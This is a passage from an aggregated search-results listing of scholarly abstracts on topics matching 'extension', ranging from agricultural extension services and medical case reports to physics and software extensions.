of work is challenging and requires deliberate effort on the part of employees and supervisors to realize there is more to life than work. Some authors have referred to this as work-life balance, but it may be more helpful to think of it as work-life effectiveness. To do this, one needs to 1) define what success looks like, 2) set boundaries and 17. Electron beam radiotherapy for the management of recurrent extensive ocular surface squamous neoplasia with orbital extension OpenAIRE Ramesh Murthy; Himika Gupta; Rahul Krishnatry; Siddhartha Laskar 2015-01-01 Recurrent extensive ocular surface squamous neoplasia (OSSN) with orbital invasion can be successfully managed with external radiotherapy using electrons resulting in eye and vision salvage. We report a case of right eye recurrent OSSN in an immunocompetent adult Indian male, with extensive orbital involvement. The patient had two previous surgical excisions with recurrent disease. At this stage, conventionally exenteration is considered the treatment modality. However, he was treated with 50... 18. Supervisory skills of extension managers in Sekhukhune District of ... African Journals Online (AJOL) ... namely at the supervisory level (Sub-District Extension Coordinators) and the top extension management level (Extension Heads). These are the two management levels that can potentially have the biggest influence on the efficiency of extension delivery. Keywords: management, leadership skills, differential perception, ... 19. A Comparison of Agricultural Extension in Five States. Science.gov (United States) Rogers, Everett M. The nature of the Cooperative Extension Service in agriculture was examined to identify aspects that could be applied to the design of an educational extension service. To learn about the organization, programs, and priorities of Cooperative Extension, employees of the state extension services in California, Colorado, New Mexico, New York, and… 20. Coping with changes in agricultural extension in Uganda and ... 
African Journals Online (AJOL) It is suggested that a national extension co-ordination organisation be formed, with the public extension system taking the lead, to co-ordinate extension activities until such a time when farmers' associations and other private organisations can take the lead in delivery and co-ordination of agricultural extension services in ... 1. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza from Agricultural Extension to Rural Development and Agricultural Extension. This was soon after they appointed a new Head of Extension who had just returned with a PhD from. Pretoria University. Makerere University in Uganda changed their Bachelor of Agricultural. Extension and Education (BAEE) program to Bachelor ... 2. Expanding Agricultural and Rural Extension Roles for Sustainable ... African Journals Online (AJOL) The effect of globalization and the attendant privatization of the public sector of national economies of developing nations has profound effect on extension service delivery. This paper reviews present concept and challenges of extension and proposes future concerns of extension service. It concludes that extension ... 3. Job satisfaction of extension workers in Edo State Agricultural ... African Journals Online (AJOL) ... of extension agents so as to be abreast of new developments, improve their knowledge and skills in new extension methodologies. With this, extension agents will be motivated and be satisfied with their jobs. Keywords: job satisfaction, extension workers. International Journal of Agriculture and Rural Development Vol. 4. Suggesting a new paradigm for agricultural extension policy: the ... African Journals Online (AJOL) In terms of approaches and functions, the study found that public sector extension in West Africa is undergoing transformation including decentralization and outsourcing extension services in the context of adopting a pluralistic system of extension delivery. While up to six models of extension are a commonly applied in the ... 5. Extension of operational limits on EAST International Nuclear Information System (INIS) Gao Xiang; Li Jiangang; Wan Baonian; Zhao Junyu; Hu Liqun; Liu Haiqing; Jie Yinxian; Xu Qiang; Wu Zhenwei; Yang Yu; Gong Xianzu; Shen Biao; Hu Jiansheng; Shi Yuejiang; Ling Bili; Wang Jun; Sajjad, S.; Zang Qing; Gao Wei; Zhang Tao; Yu Yaowei; Yang Yao; Han Xiaofeng; Shi Nan; Ming Tingfeng; Ti Ang; Zhang Wenyang; Xu Guosheng; Chen Junling; Luo Guangnan; Zhang Xiaodong; Mao Jianshan; Wan Yuanxi 2007-01-01 The first plasma has been achieved successfully in the Experimental Advanced Superconducting Tokamak (EAST). Boronization by the glow discharge (GDC) method was studied in experiments. The plasma performance was obviously improved by GDC boronization. Extension of the operational region and improvement in the plasma performance were obtained. Sawtooth discharges were observed by means of soft x-ray signals, electron cyclotron emission signals and line averaged electron density after boronization. Lower q a and more stable operation were also achieved following GDC boronization. The plasma current ramp-up rate was also improved as a result of decreased impurity content and low averaged loop voltage due to boronization 6. 
Extension of p-local finite groups OpenAIRE Broto, Carles; Castellana, Natalia; Grodal, Jesper; Levi, Ran; Oliver, Bob 2005-01-01 A p-local finite group consists of a finite p-group S, together with a pair of categories which encode conjugacy'' relations among subgroups of S, and which are modelled on the fusion in a Sylow p-subgroup of a finite group. It contains enough information to define a classifying space which has many of the same properties as p-completed classifying spaces of finite groups. In this paper, we study and classify extensions of p-local finite groups, and also compute the fundamental group of the... 7. Extensive Epidermoid Cyst and Breathing Difficulty Directory of Open Access Journals (Sweden) Ciro Dantas Soares 2015-01-01 Full Text Available Epidermoid cysts are common cystic lesions in the skin, ovaries, and testicles, but their occurrence in the oral cavity is uncommon. They consist of cysts delimited by a fibrous capsule without cutaneous annexes and are lined by stratified squamous epithelium. The differential diagnosis includes ranula, dermoid cysts, and lingual thyroid. Despite their benign presentation, these cysts can cause functional limitations, requiring special clinical attention for extensive lesions located in regions that preserve vital structures. This paper aims to report a case of epidermoid cyst in patient with swallowing and breathing difficulty, highlighting the clinical and surgical planning. 8. Emergency Anaesthetic Management of Extensive Thoracic Trauma Directory of Open Access Journals (Sweden) H C Chandola 2007-01-01 Full Text Available High speed vehicles, drug abuse, alcohol and easy availability of handguns are the main reasons of increasing number of trauma especially thoracic trauma. Anaesthesiologist plays an important role in the management of extensive thoracic trauma. Thoracic trauma, penetrating or blunt, may cause damage to organs suspended in thorax viz. pleura, lungs, heart, great vessels, trachea and oesophagus. It may lead to pneumothorax, cardiac tamponade or life threatening haemorrhage. With aggressive care and management of these factors, majority of patients can survive and return to normal life. 9. Extensive utilization of training reactor VR-1 International Nuclear Information System (INIS) Karel, Matejka; Lubomir, Sklenka 2005-01-01 This paper describes one of the main purposes of the VR-1 training reactor utilisation - i.e. extensive educational programme. The educational programme is intended for the training of university students (all technical universities in Czech Republic) and selected nuclear power plant personnel. At the present, students can go through more than 20 different experimental exercises. An attractive programme including demonstration of reactor operation is prepared also for high school students. Moreover, research and development works and information programmes proceed at the VR-1 reactor as well 10. Analytic extension of the nuclear algebraic potential Energy Technology Data Exchange (ETDEWEB) Lichtenthaeler, R. (Departamento de Fisica Nuclear, Laboratorio do Pelletron, Universidade de Sao Paulo, Caixa Postal 20516, 01452-990 Sao Paulo, Sao Paulo (Brazil)); Gomes, L.C. 
(Grupo de Fisica Nuclear Teorica e Fenomenologia de Particulas Elementares Instituto de Fisica Universidade de Sao Paulo, Caixa Postal 20516, 01498-970 Sao Paulo, Sao Paulo (Brazil)) 1994-12-01 An analytic extension of the nuclear algebraic potential in the complex energy and angular momentum planes is discussed and an approximation for the algebraic potential in agreement with the known analytic properties of the [ital S]-matrix is proposed. The invariance of the energy spectrum of the Coulomb part of the interaction is established. The results are applied to the Regge pole analysis of the [sup 12]C+[sup 24]Mg elastic collision at [ital E][sub [ital l][ital a][ital b 11. CT of perineural tumor extension: pterygopalatine fossa Energy Technology Data Exchange (ETDEWEB) Curtin, H.D.; Williams, R.; Johnson, J. 1985-01-01 Tumors of the oral cavity and paranasal sinuses can spread along nerves to areas apparently removed from the primary tumor. In tumors of the palate, sinuses, and face, this perineural spread usually involves the maxillary division of the trigeminal nerve. The pterygopalatine fossa is a pathway of the maxillary nerve and becomes a key landmark in the detection of neural metastasis by computed tomography (CT). Obliteration of the fat in the fossa suggests pathology. Case material illustrating neural extension is presented and the CT findings are described. 12. Radar reflection off extensive air showers Directory of Open Access Journals (Sweden) Werner F. 2013-06-01 Full Text Available We investigate the possibility of detecting extensive air showers by the radar technique. Considering a bistatic radar system and different shower geometries, we simulate reflection of radio waves off the static plasma produced by the shower in the air. Using the Thomson cross-section for radio wave reflection, we obtain the time evolution of the signal received by the antennas. The frequency upshift of the radar echo and the power received are studied to verify the feasibility of the radar detection technique. 13. Radio detection of extensive air showers Science.gov (United States) Huege, Tim 2017-12-01 Radio detection of extensive air showers initiated in the Earth's atmosphere has made tremendous progress in the last decade. Today, radio detection is routinely used in several cosmic-ray observatories. The physics of the radio emission in air showers is well-understood, and analysis techniques have been developed to determine the arrival direction, the energy and an estimate for the mass of the primary particle from the radio measurements. The achieved resolutions are competitive with those of more traditional techniques. In this article, I shortly review the most important achievements and discuss the potential for future applications. 14. Shift versus Extension in Refined Partition Functions CERN Document Server Krefl, Daniel 2010-01-01 We have recently shown that the global behavior of the partition function of N=2 gauge theory in the general Omega-background is captured by special geometry in the guise of the (extended) holomorphic anomaly equation. We here analyze the fate of our results under the shift of the mass parameters of the gauge theory. The preferred value of the shift, noted previously in other contexts, restores the Z_2 symmetry of the instanton partition function under inversion of the Omega-background, and removes the extension. We comment on various connections. 15. 
A Practice of English Extensive Reading OpenAIRE Yasuko, Yoshino; Tatsuhiko, Nagasaka; Ryuji, Fujikami; Andrew, Jones 2012-01-01 The Foreign Language Center (FLC) of Jissen Women's University offers an Integrated English course required for first-year students. The aim of this course is to enhance motivation for the students to acquire English and help the students to be autonomous learners. On a trial basis, an English extensive reading project was adopted in 2006 and has been improved year by year. The reason why we focused on reading was that reading is both a thinking process and a productive activity. I... 16. Extension planning for electrical energy supply systems International Nuclear Information System (INIS) Bieselt, R. 1975-01-01 In the future as well as in the past, and in particular in the next decade, a considerable increase in electrical energy demand can be expected. Satisfying this demand in a reliable and sufficient manner will force the utilities to invest large sums of money for the operation and the extension of power generation and distribution plants. The size of these investments justifies the search for more and more comprehensive and at the same time more detailed planning methods. With the help of system analysis a planning model for the electricity supply industry of a major supply area will be designed. (orig./RW) [de 17. Extensive Variation in Chromatin States Across Humans KAUST Repository Kasowski, M. 2013-10-17 The majority of disease-associated variants lie outside protein-coding regions, suggesting a link between variation in regulatory regions and disease predisposition. We studied differences in chromatin states using five histone modifications, cohesin, and CTCF in lymphoblastoid lines from 19 individuals of diverse ancestry. We found extensive signal variation in regulatory regions, which often switch between active and repressed states across individuals. Enhancer activity is particularly diverse among individuals, whereas gene expression remains relatively stable. Chromatin variability shows genetic inheritance in trios, correlates with genetic variation and population divergence, and is associated with disruptions of transcription factor binding motifs. Overall, our results provide insights into chromatin variation among humans. 18. Extensive spinal epidural abscess complicated with hydrocephalus Directory of Open Access Journals (Sweden) Balan Corneliu 2015-12-01 Full Text Available Spinal epidural abscess is a rare but severe infection requiring prompt recognition in order to have a favorable outcome and appropriate treatment, mainly surgical. We present one of the largest extensions of such an abscess in the literature, involving the whole spine. No surgical treatment was attempted due to the involvement of 19 levels; antibiotics were used instead. The evolution of the lesion was complicated by hydrocephalus, through a mechanism of cervical blockage of CSF flow, and required first external ventricular drainage and later ventriculo-peritoneal drainage. 19. Effective, Efficient Online Training in Cooperative Extension Directory of Open Access Journals (Sweden) Jane Chin Young 2014-09-01 Full Text Available In order to keep pace with media and communications trends in education, Cooperative Extension (CE) faces the need to shift from traditional face-to-face delivery to online alternatives. This exploratory study focused on evaluating the effectiveness of on-demand, interactive online training compared to its face-to-face counterpart.
Targeted for CE staff and volunteers whose work impacts youth, families and communities, the design centered on the university’s cost-effective in-house technology tools. The study results make the case for online delivery as effective and efficient. Strategies for developing a process for online delivery in CE are also offered. 20. A PARALLEL EXTENSION OF THE UAL ENVIRONMENT International Nuclear Information System (INIS) MALITSKY, N.; SHISHLO, A. 2001 The deployment of the Unified Accelerator Library (UAL) environment on the parallel cluster is presented. The approach is based on the Message-Passing Interface (MPI) library and the Perl adapter that allows one to control and mix together the existing conventional UAL components with the new MPI-based parallel extensions. In the paper, we provide timing results and describe the application of the new environment to the SNS Ring complex beam dynamics studies, particularly, simulations of several physical effects, such as space charge, field errors, fringe fields, and others. 1. A PARALLEL EXTENSION OF THE UAL ENVIRONMENT. Energy Technology Data Exchange (ETDEWEB) MALITSKY, N.; SHISHLO, A. 2001-06-18 The deployment of the Unified Accelerator Library (UAL) environment on the parallel cluster is presented. The approach is based on the Message-Passing Interface (MPI) library and the Perl adapter that allows one to control and mix together the existing conventional UAL components with the new MPI-based parallel extensions. In the paper, we provide timing results and describe the application of the new environment to the SNS Ring complex beam dynamics studies, particularly, simulations of several physical effects, such as space charge, field errors, fringe fields, and others. 2. Improved Extension Neural Network and Its Applications Directory of Open Access Journals (Sweden) Yu Zhou 2014-01-01 Full Text Available Extension neural network (ENN) is a new neural network that is a combination of extension theory and artificial neural network (ANN). The learning algorithm of ENN is based on a supervised learning algorithm. One of the important issues in the field of classification and recognition of ENN is how to achieve the best possible classifier with a small number of labeled training data. Training data selection is an effective approach to solve this issue. In this work, in order to improve the supervised learning performance and expand the engineering application range of ENN, we use a novel data selection method based on shadowed sets to refine the training data set of ENN. Firstly, we use a clustering algorithm to label the data and induce shadowed sets. Then, in the framework of shadowed sets, the samples located around each cluster center (core data) and at the borders between clusters (boundary data) are selected as training data. Lastly, we use selected data to train ENN. Compared with traditional ENN, the proposed improved ENN (IENN) has a better performance. Moreover, IENN is independent of the supervised learning algorithms and initial labeled data. Experimental results verify the effectiveness and applicability of our proposed work. 3. Dynamic extension and configuration of multimedia terminals Science.gov (United States) Schaefer, Ralf; Finger, Ulrich 1999-01-01 In this paper, we present an implementation of an MPEG-4 decoder using Java for dynamic processing, i.e. providing flexibility and extensibility. The advantage of Java is its platform independent paradigm using a virtual machine.
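The data-selection step summarized in item 2 above (cluster the pool, then keep "core" samples near cluster centers and "boundary" samples between clusters) can be sketched as follows. This is an illustrative reconstruction rather than the authors' code: the choice of KMeans, the inverse-distance membership, and the fixed thresholds are assumptions, whereas a genuine shadowed-set construction would derive the thresholds by optimization.

```python
# Illustrative sketch (not the authors' code): selecting "core" and "boundary"
# training samples via a shadowed-set-style partition of cluster memberships.
import numpy as np
from sklearn.cluster import KMeans

def select_training_data(X, n_clusters=3, core_thr=0.7, boundary_thr=0.4):
    """Return indices of core and boundary samples.

    Membership is approximated from inverse distances to the cluster centers;
    the thresholds separating core / shadow / excluded regions are fixed here
    for simplicity, whereas a true shadowed-set construction optimizes them.
    """
    km = KMeans(n_clusters=n_clusters, n_init=10, random_state=0).fit(X)
    d = km.transform(X)                                  # distances to each center
    sim = 1.0 / (d + 1e-9)                               # closer center -> larger value
    membership = sim / sim.sum(axis=1, keepdims=True)    # normalize to pseudo-memberships
    top = membership.max(axis=1)

    core = np.where(top >= core_thr)[0]                                   # near a center
    boundary = np.where((top >= boundary_thr) & (top < core_thr))[0]      # between clusters
    return core, boundary

# Example usage with random data standing in for the unlabeled pool:
X = np.random.rand(200, 4)
core_idx, boundary_idx = select_training_data(X)
train_idx = np.concatenate([core_idx, boundary_idx])     # data that would train the ENN
```

The selected indices would then feed whatever ENN implementation is being trained; the refinement itself is independent of that classifier, which is the point the abstract makes.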
This enables us to provide downloading of tools and also dynamic configuration of already downloaded tools. However, the disadvantage of Java is its low performance. Therefore we propose a hybrid implemented approach using Java implementations only for flexibility and extensibility. All the rest of the decoder is implemented in native code, providing the high performance necessary for real time issues. We use Java only where Java is necessary. To integrate Java with the native code implementations we utilize the Java native interface (JNI). We use the JNI to create an instance of the Java virtual machine (JVM) in the running MPEG-4 application. This JVM instance handles all Java decoder tool implementations as well as incoming Java bit streams. All the other data streams are handled by the native implemented part. 4. Radial Extension, Prototypicality, and Tectonic Equivalence Directory of Open Access Journals (Sweden) Shaver Stephen R. 2018-01-01 Full Text Available In his book “Without Metaphor, No Saving God: Theology After Cognitive Linguistics”, Robert Masson describes a metaphoric process by which newly accepted truths emerge: for example, in the assertion “Jesus is the Messiah,” Christians reconfigure the field of meanings associated with an existing concept from the Hebrew scriptures (messiah by asserting its identification with Jesus. Masson dubs this process a “tectonic equivalence” or “tectonic shift.” In this paper I build on Masson‘s work by examining some of the shifts he describes as tectonic through the lens of the cognitive linguistics concepts of radial extension and polysemy. I propose that a lasting tectonic shift may be understood as a blend creating a radial extension that substantially alters the category structure of the original source frame so that the blended space comes to be understood as a central instance of that category. Such an approach allows a fruitful analysis of the similarities and differences among three example blends: god is a rock, jesus is the messiah, and jesus is god. 5. Life extension by calorie restriction in humans. Science.gov (United States) Everitt, Arthur V; Le Couteur, David G 2007-10-01 Long-term reduction in energy intake in the diet (calorie restriction [CR]) extends the life of the laboratory rat by about 25%. However, in humans there are no life-long studies of CR, but only short-term trials which indicate that 20% CR acting over periods of 2-6 years is associated with reduced body weight, blood pressure, blood cholesterol, and blood glucose--risk factors for the major killer diseases of cardiovascular disease and diabetes. In addition, recent research has shown that CR for 6 months is able to improve biomarkers for longevity (deep body temperature and plasma insulin) and thus should increase life expectancy. The magnitude of the life-extension effect of CR in humans can only be estimated. The Okinawans, the longest-lived people on earth, consume 40% fewer calories than the Americans and live only 4 years longer. Similarly, women in United States consume 25% fewer calories than men and live 5 years longer. From the survival studies of overweight and obese people, it is estimated that long-term CR to prevent excessive weight gain could add only 3-13 years to life expectancy. 
Thus the effects of CR on human life extension are probably much smaller than those achieved by medical and public health interventions, which have extended life by about 30 years in developed countries in the 20th century, by greatly reducing deaths from infections, accidents, and cardiovascular disease. 6. [Extensive swelling reaction after a pentavalent vaccination]. Science.gov (United States) Gébus, M; Barbier, C; Bost-Bru, C; Michard-Lenoir, A P; Plantaz, D 2015-09-01 Injection site reactions (ISRs) are quite common side effects defined by a local adverse drug reaction directly caused by a vaccine. Twenty-four hours after an intramuscular injection (in the deltoid muscle) of the diphtheria, tetanus, acellular pertussis, inactivated poliomyelitis, Haemophilus influenzae type b (DTPCa-Hib) combined vaccine, a 3-year-old boy developed fever. A few hours later, local redness and swelling appeared at the injection site, with rapid extension to the entire limb; it was pain-free, and no other clinical anomalies were present. The patient received intravenous antibiotics for suspected cellulitis. The progression was favorable in 12h (apyrexia and decreased limb swelling), allowing the intravenous antibiotic treatment to be discontinued. Since the child was in excellent general health and recovery was fast, an ISR was diagnosed. Extensive limb swelling is frequent, mostly after the fourth dose of DTPCa-Hib. Deltoid muscle injection of DTP vaccine increases the risk of ISR compared to injection in the thigh, before the age of 3 years. The introduction of acellular pertussis vaccine decreased the risk of general side effects but may increase the risk of ISR. These reactions disappear with symptomatic treatment and do not contraindicate the product. Copyright © 2015 Elsevier Masson SAS. All rights reserved. 7. Extensive Growth of an Anaplastic Meningioma Directory of Open Access Journals (Sweden) Hajrullah Ahmeti 2013-01-01 Full Text Available We present the case of a 30-year-old male patient with an almost complete destruction of the calvarial bone through an anaplastic meningioma diagnosed in the context of dizziness. Neuroimaging revealed an extensively growing, contrast-enhancing lesion expanding at the supra- and infratentorial convexity, infiltrating and destroying large parts of the skull, and infiltrating the skin. Due to progressive ataxia and dysarthria, with proven tumor growth in the posterior fossa over the further course, parts of the tumor were resected. A surgical procedure with the aim of complete tumor resection in a curative manner was not possible. Six months after the first operation, due to renewed tumor progression, the most extensive tumor resection possible was performed. Due to the aggressive and destructive growth with a high rate of recurrence and tendency of metastases, anaplastic meningiomas can be termed malignant tumors. The extrinsic growth masks the tumor until it reaches a size that makes these tumors almost unresectable. In the best-case scenarios, the five-year survival is about 50%. With the presented case, we would like to show the aggressive behavior of anaplastic meningiomas in a very illustrative way. Chemotherapy, radiotherapy, and surgery reach their limits in this tumor entity. 8. Microcanonical ensemble extensive thermodynamics of Tsallis statistics International Nuclear Information System (INIS) Parvan, A.S.
2005-01-01 The microscopic foundation of the generalized equilibrium statistical mechanics based on the Tsallis entropy is given by using the Gibbs idea of statistical ensembles of the classical and quantum mechanics. The equilibrium distribution functions are derived by the thermodynamic method based upon the use of the fundamental equation of thermodynamics and the statistical definition of the functions of the state of the system. It is shown that if the entropic index ξ = 1/(q − 1) in the microcanonical ensemble is an extensive variable of the state of the system, then in the thermodynamic limit z̄ = 1/[(q − 1)N] = const the principle of additivity and the zeroth law of thermodynamics are satisfied. In particular, the Tsallis entropy of the system is extensive and the temperature is intensive. Thus, the Tsallis statistics completely satisfies all the postulates of equilibrium thermodynamics. Moreover, evaluation of the thermodynamic identities in the microcanonical ensemble is provided by the Euler theorem. The principle of additivity and the Euler theorem are explicitly proved by using the illustration of the classical microcanonical ideal gas in the thermodynamic limit. 9. Microcanonical ensemble extensive thermodynamics of Tsallis statistics International Nuclear Information System (INIS) Parvan, A.S. 2006-01-01 The microscopic foundation of the generalized equilibrium statistical mechanics based on the Tsallis entropy is given by using the Gibbs idea of statistical ensembles of the classical and quantum mechanics. The equilibrium distribution functions are derived by the thermodynamic method based upon the use of the fundamental equation of thermodynamics and the statistical definition of the functions of the state of the system. It is shown that if the entropic index ξ = 1/(q − 1) in the microcanonical ensemble is an extensive variable of the state of the system, then in the thermodynamic limit z̄ = 1/[(q − 1)N] = const the principle of additivity and the zeroth law of thermodynamics are satisfied. In particular, the Tsallis entropy of the system is extensive and the temperature is intensive. Thus, the Tsallis statistics completely satisfies all the postulates of equilibrium thermodynamics. Moreover, evaluation of the thermodynamic identities in the microcanonical ensemble is provided by the Euler theorem. The principle of additivity and the Euler theorem are explicitly proved by using the illustration of the classical microcanonical ideal gas in the thermodynamic limit. 10. Extension of yeast chronological lifespan by methylamine. Directory of Open Access Journals (Sweden) Sanjeev Kumar Full Text Available BACKGROUND: Chronological aging of yeast cells is commonly used as a model for aging of human post-mitotic cells. The yeast Saccharomyces cerevisiae grown on glucose in the presence of ammonium sulphate is mainly used in yeast aging research. We have analyzed chronological aging of the yeast Hansenula polymorpha grown at conditions that require primary peroxisome metabolism for growth. METHODOLOGY/PRINCIPAL FINDINGS: The chronological lifespan of H. polymorpha is strongly enhanced when cells are grown on methanol or ethanol, metabolized by peroxisome enzymes, relative to growth on glucose that does not require peroxisomes. The short lifespan of H. polymorpha on glucose is mainly due to medium acidification, whereas most likely ROS do not play an important role. Growth of cells on methanol/methylamine instead of methanol/ammonium sulphate resulted in further lifespan enhancement.
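For reference, the quantities quoted in items 8 and 9 above can be written out explicitly. The Tsallis entropy below is the standard textbook definition and is not copied from the papers themselves; the extensivity condition restates the thermodynamic limit given in the abstracts.

```latex
% Tsallis entropy for microstate probabilities p_i (standard definition),
% recovering the Boltzmann-Gibbs entropy as q -> 1.
\[
  S_q \;=\; k_B\,\frac{1-\sum_i p_i^{\,q}}{q-1},
  \qquad
  \lim_{q\to 1} S_q \;=\; -k_B \sum_i p_i \ln p_i .
\]
% Entropic index and the thermodynamic limit quoted in the abstracts above:
% q approaches 1 as the particle number N grows, with z-bar held constant.
\[
  \xi \;=\; \frac{1}{q-1}, \qquad
  \bar{z} \;=\; \frac{1}{(q-1)\,N} \;=\; \text{const} \quad (N \to \infty).
\]
```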
This was unrelated to medium acidification. We show that oxidation of methylamine by peroxisomal amine oxidase at carbon starvation conditions is responsible for lifespan extension. The methylamine oxidation product formaldehyde is further oxidized resulting in NADH generation, which contributes to increased ATP generation and reduction of ROS levels in the stationary phase. CONCLUSION/SIGNIFICANCE: We conclude that primary peroxisome metabolism enhanced chronological lifespan of H. polymorpha. Moreover, the possibility to generate NADH at carbon starvation conditions by an organic nitrogen source supports further extension of the lifespan of the cell. Consequently, the interpretation of CLS analyses in yeast should include possible effects on the energy status of the cell. 11. Extension of association models to complex chemicals DEFF Research Database (Denmark) Avlund, Ane Søgaard ; CPA and sPC-SAFT. Phase equilibrium and monomer fraction calculations with sPC-SAFT for methanol are used in the thesis to illustrate the importance of parameter estimation when using SAFT. Different parameter sets give similar pure component vapor pressure and liquid density results, whereas very......Summary of “Extension of association models to complex chemicals”. Ph.D. thesis by Ane Søgaard Avlund The subject of this thesis is application of SAFT type equations of state (EoS). Accurate and predictive thermodynamic models are important in many industries including the petroleum industry...... not account for steric self-hindrance for tree-like structures. An important practical problem is how to obtain optimal and consistent parameters. Moreover, multifunctional associating molecules represent a special challenge. In this work two equations of state using the SAFT theory for association are used... 12. A Moodle extension to book online labs Directory of Open Access Journals (Sweden) Antonio C. Cardoso 2005-11-01 Full Text Available The social constructivist philosophy of Moodle makes it an excellent choice to deliver e-learning contents that require collaborative activities, such as those that are associated with online labs. In the case of online labs that enable web access to real devices (remote workbenches, access time should be reserved beforehand. A booking tool will avoid access conflicts and at the same time will help the students to organise their time and activities. This paper presents a Moodle extension that was developed within the Leonardo da Vinci MARVEL project, with the objective of meeting this requirement. The booking tool presented enables resource sharing in general and may be used to organise access to any type of scarce resources, such as to online labs and to the videoconferencing rooms that are needed to support collaborative activities. 13. BB-CLIPS: Blackboard extensions to CLIPS Science.gov (United States) Orchard, Robert A.; Diaz, Aurora C. 1990-01-01 This paper describes a set of extensions made to CLIPS version 4.3 that provide capabilities similar to the blackboard control architecture described by Hayes-Roth. There are three types of additions made to the CLIPS shell. The first extends the syntax to allow the specification of blackboard locations for CLIPS facts. The second implements changes in CLIPS rules and the agenda manager that provide some of the powerful features of the blackboard control architecture. These additions provide dynamic prioritization of rules on the agenda allowing control strategies to be implemented that respond to the changing goals of the system. 
The final category of changes support the needs of continuous systems, including the ability for CLIPS to continue execution with an empty agenda. 14. Requirement Generation For The Habitation Extension Module Science.gov (United States) Hempsell, M. As part of a debate within United Kingdom regarding its policy to avoid project involving human space flight, a study design was produced to explore the implications of a late entry as a full partner in the International Space Station (ISS). This objective generates many diverse requirements from the two primary stakeholders, the existing ISS partners and United Kingdom itself. It was found that a Soyuz/Fregat launched Habitation Extension Module with a logistic supply capability could meet all these requirements. It is unusual for a system to successfully meet such a wide range of requirements, but in this case the ability to scope the requirements in a single objective and the flexibility inherent in the wide design space created by the many options have made it possible. 15. Energy Extension Service Program planning manual Energy Technology Data Exchange (ETDEWEB) Liersch, Judith M. 1979-06-01 The manual is the first revision of the EES Program Planning Manual. At the states' request, there have been a number of changes to the state EES contacts list, and an updated list is included in this package as the revised Appendix D. Part I, Introduction, presents: How to Use the State Program Planning Manual and The Energy Extension Service Program. Part II, Applying for an EES Grant, presents: The Annual State Application for Financial Assistance; State Financial Assistance and Associated Requirements; Preparing the State Plan. Part III, Operating a State EES, presents: Start-Up Considerations; State Program Reporting; Recordkeeping and Financial Management. Part IV, DOE's Role, presents DOE Functions and Responsibilities and Special Cases: Development and Implementation of a State Plan by the EES Director and Administrative Review. 16. Covariant extensions and the nonsymmetric unified field International Nuclear Information System (INIS) Borchsenius, K. 1976-01-01 The problem of generally covariant extension of Lorentz invariant field equations, by means of covariant derivatives extracted from the nonsymmetric unified field, is considered. It is shown that the contracted curvature tensor can be expressed in terms of a covariant gauge derivative which contains the gauge derivative corresponding to minimal coupling, if the universal constant p, characterizing the nonsymmetric theory, is fixed in terms of Planck's constant and the elementary quantum of charge. By this choice the spinor representation of the linear connection becomes closely related to the spinor affinity used by Infeld and Van Der Waerden (Sitzungsber. Preuss. Akad. Wiss. Phys. Math. Kl.; 9:380 (1933)) in their generally covariant formulation of Dirac's equation. (author) 17. Complex singlet extension of the standard model International Nuclear Information System (INIS) Barger, V.; Langacker, P.; McCaskey, M.; Ramsey-Musolf, M.; Shaughnessy, G. 2009-01-01 We analyze a simple extension of the standard model (SM) obtained by adding a complex singlet to the scalar sector (cxSM). We show that the cxSM can contain one or two viable cold dark matter candidates and analyze the conditions on the parameters of the scalar potential that yield the observed relic density. 
When the cxSM potential contains a global U(1) symmetry that is both softly and spontaneously broken, it contains both a viable dark matter candidate and the ingredients necessary for a strong first order electroweak phase transition as needed for electroweak baryogenesis. We also study the implications of the model for discovery of a Higgs boson at the Large Hadron Collider. 18. Analytical extension of curved shock theory Science.gov (United States) Emanuel, G. 2018-03-01 Curved shock theory (CST) is limited to shock waves in a steady, two-dimensional or axisymmetric (2-Ax) flow of a perfect gas. A unique feature of CST is its use of intrinsic coordinates that result in an elegant and useful formulation for flow properties just downstream of a shock. For instance, the downstream effect of upstream vorticity, shock wave curvature, and the upstream pressure gradient along a streamline is established. There have been several attempts to extend CST, as mentioned in the text. Removal of the steady, 2-Ax, and perfect gas limitations, singly or in combination, requires an appropriate formulation of the shock wave's jump relations and the intrinsic coordinate Euler equations. Issues discussed include flow plane versus osculating plane, unsteady flow, vorticity, an imperfect gas, etc. The extension of CST utilizes concepts from differential geometry, such as the osculating plane, streamline torsion, and the Serret-Frenet equations. 19. Extensive hypertrophic lupus erythematosus: Atypical presentation Directory of Open Access Journals (Sweden) Tarun Narang 2012-01-01 Lupus erythematosus (LE) is a disease with a wide spectrum of cutaneous and systemic manifestations. Clinical features of patients with LE show a great variation, and for this reason it is difficult to develop a unifying concept of this disease. Our objective is to present a case of hypertrophic LE with atypical morphology and extensive involvement, who responded favorably to isotretinoin. Diagnosis of hypertrophic lupus erythematosus (HLE) was confirmed by characteristic histopathological findings. Combination therapy with isotretinoin and hydroxychloroquine resulted in flattening and repression of previously refractory skin lesions. Sometimes, HLE lesions may present a diagnostic and therapeutic dilemma. In long standing lesions, squamous cell carcinoma may arise. Therefore, HLE requires adequate therapy with clinical and histopathological follow up. 20. Holomorphic extension of generalizations of Hp functions Directory of Open Access Journals (Sweden) Richard D. Carmichael 1985-01-01 In recent analysis we have defined and studied holomorphic functions in tubes in ℂⁿ which generalize the Hardy Hp functions in tubes. In this paper we consider functions f(z), z = x + iy, which are holomorphic in the tube T^C = ℝⁿ + iC, where C is the finite union of open convex cones Cj, j=1,…,m, and which satisfy the norm growth of our new functions. We prove a holomorphic extension theorem in which f(z), z ∈ T^C, is shown to be extendable to a function which is holomorphic in T^{0(C)} = ℝⁿ + i0(C), where 0(C) is the convex hull of C, if the distributional boundary values in 𝒮′ of f(z) from each connected component T^{Cj} of T^C are equal. 1. Learning investment indicators through data extension Science.gov (United States) Dvořák, Marek 2017-07-01 Stock prices in the form of time series were analysed using single and multivariate statistical methods.
